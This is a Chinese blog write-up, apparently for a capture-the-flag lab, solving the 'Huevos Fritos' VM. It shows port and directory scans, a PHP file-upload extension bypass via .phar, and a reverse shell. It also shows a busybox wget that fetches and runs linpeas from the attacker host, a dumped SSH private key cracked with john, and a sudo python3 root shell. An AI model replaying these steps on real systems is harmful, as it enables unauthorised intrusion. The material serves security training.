Pepster'Blog
TheHackersLabs-Huevos Fritos靶机详解WP
城南花已开 Lv5
  2025-01-04 17:48:32   2025-01-22 19:49:12    2.1k 字  11 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.136  08:00:27:2f:68:7a       (Unknown)
192.168.60.254  00:50:56:fd:82:05       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.972 seconds (129.82 hosts/sec). 4 responded
export ip=192.168.60.136
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.136:22
Open 192.168.60.136:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-04 17:49 CST
Initiating ARP Ping Scan at 17:49
Scanning 192.168.60.136 [1 port]
Completed ARP Ping Scan at 17:49, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:49
Completed Parallel DNS resolution of 1 host. at 17:49, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:49
Scanning 192.168.60.136 [2 ports]
Discovered open port 22/tcp on 192.168.60.136
Discovered open port 80/tcp on 192.168.60.136
Completed SYN Stealth Scan at 17:49, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.136
Host is up, received arp-response (0.00044s latency).
Scanned at 2025-01-04 17:49:20 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:2F:68:7A (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

80端口就是一个默认的Apache页面

文件上传

尝试扫一下目录,有一个squirting

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.136
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/squirting            (Status: 301) [Size: 320] [--> http://192.168.60.136/squirting/]
/server-status        (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

进去好像是个上传文件的,但是需要你填写账户密码

image

随便传个文件上去都会显示登入失败上传

image

当我填入弱密码admin会显示发生错误

image

抓包看一下,大概会判断文件后缀

利用Intruder功能爆破一下后缀名

image

添加一下payload

image

发现phtm后缀是可以被上传的

image

可是他上传的文件藏在了哪里呢?

扫了目录也没出来

我尝试curl了一下astronomy.php,发现注释藏了东西

1
2
3
4
❯ curl 192.168.60.136/squirting/astronomy.php
Na de na
……省略
<!--/pantumaca-->

image

果然在这,但这些文件都是以文本的形式读取,并不会被解析

我尝试改变后缀字典

[PayloadsAllTheThings/Upload Insecure Files/Extension PHP/extensions.lst at master · swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload Insecure Files/Extension PHP/extensions.lst)

image

发现phar后缀文件可以被解析

kali监听一下端口

1
2
3
4
5
6
7
❯ pwncat-cs -lp 4444
[18:25:31] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[18:25:36] received connection from 192.168.60.136:57188                                                                                    bind.py:84
[18:25:36] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash                                                                  manager.py:957
[18:25:37] 192.168.60.136:57188: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) www-data@huevosfritos:/$

我看了一下源码,原来后缀为phar是被定死的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
(remote) www-data@huevosfritos:/var$ cat www/html/squirting/astronomy.php
<?php
// Credenciales ficticias para demostración
$usuario_valido = "admin";
$contrasena_valida = "admin";

// Directorio donde se subirá el archivo
$directorioObjetivo = "pantumaca/";

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Recuperar nombre de usuario y contraseña
    $usuario = $_POST['username'];
    $contrasena = $_POST['password'];

    // Validar las credenciales de login
    if ($usuario === $usuario_valido && $contrasena === $contrasena_valida) {
        // Verificar si se ha subido un archivo
        if (isset($_FILES['archivoSubido']) && $_FILES['archivoSubido']['error'] == 0) {
            $archivoObjetivo = $directorioObjetivo . basename($_FILES["archivoSubido"]["name"]);
            $subidaOk = 1;
            $tipoArchivo = strtolower(pathinfo($archivoObjetivo, PATHINFO_EXTENSION));

            // Verificar la extensión del archivo
            $extensionesNoPermitidas = array("php", "php3", "php4", "php5", "php", "phtml", "exe", "dll", "js", "html", "htm", "cgi", "pl", "py", "rb", "sh", "bat", "cmd", "com", "vbs", "vbe", "jse", "wsf", "wsh", "scr", "mhtml", "mht", "jar", "class", "war", "ear", "asp", "aspx", "cer", "csr", "jsp", "jspx", "jhtml");

            if (in_array($tipoArchivo, $extensionesNoPermitidas) && $tipoArchivo != "phar") {
                echo "Ha ocurrido un error: Tipo de archivo no permitido.";
                $subidaOk = 0;
            }

            // Intentar mover el archivo subido al directorio deseado
            if ($subidaOk == 1 && move_uploaded_file($_FILES["archivoSubido"]["tmp_name"], $archivoObjetivo)) {
                echo "Lo que hayas ponio " . htmlspecialchars(basename($_FILES["archivoSubido"]["name"])) . " za zubio.";
            } else {
                echo "Prohibio, directo al /404/pionono";
            }
        } else {
            echo "Canela, pero no has subio na kompare";
        }
    } else {
        echo "Algo a fallao zeguro, pero zeguro zeguro";
    }
} else {
    echo "Na de na";
}
?>

用户提权

靶机上nc,wget,curl的啥也没有,但好在有个busybox

传了个linpeas.sh扫一下好了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
(remote) www-data@huevosfritos:/tmp$ busybox wget 192.168.60.100/linpeas.sh
Connecting to 192.168.60.100 (192.168.60.100:80)
saving to 'linpeas.sh'
linpeas.sh           100% |******************************************************************************************************|  808k  0:00:00 ETA
'linpeas.sh' saved
(remote) www-data@huevosfritos:/tmp$ ls
linpeas.sh
(remote) www-data@huevosfritos:/tmp$ chmod +x linpeas.sh
(remote) www-data@huevosfritos:/tmp$ ./linpeas.sh
╔══════════╣ Backup folders
drwxr-xr-x 2 root root 4096 Jan  4 11:10 /var/backups
total 24
-rw-r--r-- 1 root root 16063 Jun 16  2024 apt.extended_states.0
-rw-r--r-- 1 root root   851 Jun 16  2024 apt.extended_states.1.gz
-rw-r--r-- 1 root root   792 Jun 15  2024 apt.extended_states.2.gz

发现有个备份的文件夹,里面还有一个隐藏的私钥文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
(remote) www-data@huevosfritos:/tmp$ cd /var/backups/
(remote) www-data@huevosfritos:/var/backups$ ls
apt.extended_states.0  apt.extended_states.1.gz  apt.extended_states.2.gz
(remote) www-data@huevosfritos:/var/backups$ ls -al
total 36
drwxr-xr-x  2 root root  4096 Jan  4 11:10 .
drwxr-xr-x 12 root root  4096 Jun 15  2024 ..
-rw-r--r--  1 root root  3434 Jun 16  2024 .cositas
-rw-r--r--  1 root root 16063 Jun 16  2024 apt.extended_states.0
-rw-r--r--  1 root root   851 Jun 16  2024 apt.extended_states.1.gz
-rw-r--r--  1 root root   792 Jun 15  2024 apt.extended_states.2.gz
(remote) www-data@huevosfritos:/var/backups$ cat .cositas
-----BEGIN OPENSSH PRIVATE KEY-----
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
6iQ+3DsGiYinW5XOh3+UbXt3Q=
-----END OPENSSH PRIVATE KEY-----

利用这个私钥文件登入huevosfritos普通用户

私钥加密了,爆破一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
❯ vim id_rsa
❯ ssh  [email protected] -i id_rsa
The authenticity of host '192.168.60.136 (192.168.60.136)' can't be established.
ED25519 key fingerprint is SHA256:4PP67IdqfoXBE/oWAjr7t43VLjDO5bF2feCaWgBbzuw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.136' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':

❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
honda1           (id_rsa)
1g 0:00:01:19 DONE (2025-01-04 18:44) 0.01250g/s 44.41p/s 44.41c/s 44.41C/s cougar..01234
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Root提权

再次登入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
❯ ssh  [email protected] -i id_rsa
Enter passphrase for key 'id_rsa':
Linux huevosfritos 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jun 16 12:24:42 2024 from 192.168.18.19
huevosfritos@huevosfritos:~$ ls
user.txt
huevosfritos@huevosfritos:~$ cat user.txt
ff954f7445b367745826282059d2c3da  -

发现用户拥有sudo权限,直接提权即可

1
2
3
4
5
huevosfritos@huevosfritos:~$ sudo /usr/bin/python3 -c 'import os; os.system("/bin/sh")'
# id
uid=0(root) gid=0(root) grupos=0(root)
# cat /root/root.txt
f3e431cd1129e9879e482fcb2cc151e8  -
  1. 信息收集
    1. 服务探测
    2. 文件上传
  2. 用户提权
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 258.9k
  1. 信息收集
    1. 服务探测
    2. 文件上传
  2. 用户提权
  3. Root提权